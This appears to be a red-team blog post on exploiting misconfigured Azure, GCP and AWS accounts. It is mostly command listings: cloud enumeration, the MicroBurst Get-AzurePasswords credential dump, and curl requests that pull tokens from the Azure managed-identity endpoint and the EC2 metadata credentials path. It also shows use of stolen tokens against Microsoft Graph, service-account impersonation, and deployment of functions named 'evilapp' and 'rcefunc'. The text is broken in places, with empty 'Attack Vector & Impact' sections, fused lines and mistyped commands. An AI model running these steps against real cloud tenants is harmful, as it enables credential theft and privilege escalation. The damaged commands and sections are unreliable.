The pivot to cloud infrastructure has fundamentally reshaped the adversarial landscape. Enterprises leveraging Azure and Google Cloud Platform (GCP) often underestimate the complexity of securing distributed identities, role-based access controls (RBAC), and resource provisioning models. This introduces a misconfiguration that red teams can weaponize to escalate privileges, exfiltrate sensitive data, or achieve persistent access.
Credentialed Access (via Az CLI):
az login # Auth with user or service principal.
az acount list # Enumerate subscriptions.
az ad user list # Dump AD users.
az role assignment list # Identify excessive privileges.
az ad sp list --show-mine # Shows accessible service principals
az storage account list # Discover blob containers and their access levels
MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Verbose
Invoke-EnumerateAzureSubDomains -Verbose
Get-AzurePasswords -Verbose
Enumeration with gcloud CLI:
gcloud auth login
gcloud projects list
gcloud iam roles list --project=<project-id>
gcloud iam service-accounts list
gcloud projects get-iam-policy <project-id>
CloudFox Sample Command:
cloudfox gcp -p <project-id> --all
Zoom image will be displayed
Credentialed Enumeration via AWS CLI:
aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws iam list-policies -scope Local
aws s3 ls
Tools: enumerate-iam
, Pacu
, CloudSploit
, ScoutSuite
, awscli
Misconfigurations typically arise due to over-permissive IAM policies, improper exposure of public resources, and ignorance of internal privilege boundaries.
Misconfigurations, Attack Vector & Impact:
Tools: MicroBurst
, StormSpotter
, ADDInternals
, Az CLI
Misconfigurations, Attack Vector & Impact:
Tools: gcloud
, CloudFox
, GCPBuckeBrute
, Pacu
Misconfigurations, Attack Vector & Impact:
“Action”:”*”
): Grants unrestricted access to services, enabling privilege escalationTools: enumerate-iam
, CloudSploit
, Pacu
, ScoutSuite
, AWSBucketDump
az functionapp create --name evilapp --resource-group rg1 --storage-account mystorage
curl -H Metadata:true "http://localhost:8080/msi/token?resource=https://graph.microsoft.com"
curl -X GET -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/users
gcloud auth activate-service-account --key-file=creds.json
gcloud iam service-accounts impersonate --target-service-account [email protected]
gcloud functions deploy rcefunc --runtime python39 --trigger-http --entry-point=main
# Access metadata from EC2 instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/# Use harvested creds to escalate via STS
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name <extracted-user>
Tools: ScoutSuite
, Prowler
, Security Hub
, CloudSploit
, AWS Config
Cloud security is a lattice of privilege inheritance, implicit trust, and user error. Red teams must embrace cloud-native tactics that move laterally across identity providers, abuse role assumptions, and persist in serverless environments.
In 2025, the most dangerous cloud exploit isn’t a vulnerability, it’s a misconfigured role you forgot existed.